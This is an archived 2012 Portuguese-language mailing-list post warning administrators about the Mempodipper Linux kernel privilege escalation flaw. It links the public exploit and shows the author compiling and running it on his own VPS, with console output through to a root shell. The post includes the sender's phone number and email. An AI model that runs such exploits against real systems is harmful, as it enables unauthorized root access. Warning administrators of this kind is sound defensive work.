[SP-pm] [OFF] Linux Kernel Privilege Escalation >= 2.6.39
Daniel Mantovani
daniel.oliveira.mantovani at gmail.com
Fri Jan 27 06:04:31 PST 2012
Acabei de testar na minha vps,
mantovani em mantovanilabs:~$ gcc mempodipper.c
mantovani em mantovanilabs:~$ ls
a.out apps mempodipper.c Perl perl5
mantovani em mantovanilabs:~$ chmod +x a.out
mantovani em mantovanilabs:~$ ./a.out
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x4020b8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/16574/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x4020ac.
[+] Executing su with shellcode.
# uname -a
Linux mantovanilabs.com 3.0.4-x86_64-linode21 #1 SMP Thu Sep 1 21:28:01 EDT 2011 x86_64 GNU/Linux
--
Software Engineer
Just Another Perl Hacker
Daniel Mantovani +5511 8538-9897
XOXO
On Jan 27, 2012, at 12:02 PM, Daniel Mantovani wrote:
> http://www.techworld.com.au/article/413300/linux_vendors_rush_patch_privilege_escalation_flaw_after_root_exploits_emerge
> o exploit, http://www.exploit-db.com/exploits/18411/
>
> Atencao administradores, o assunto 'e serio.
>
>
> --
> Software Engineer
> Just Another Perl Hacker
> Daniel Mantovani +5511 8538-9897
> XOXO
>
-------------- Pr?xima Parte ----------
Um anexo em HTML foi limpo...
URL: <http://mail.pm.org/pipermail/saopaulo-pm/attachments/20120127/b21e1c12/attachment.html>
More information about the SaoPaulo-pm
mailing list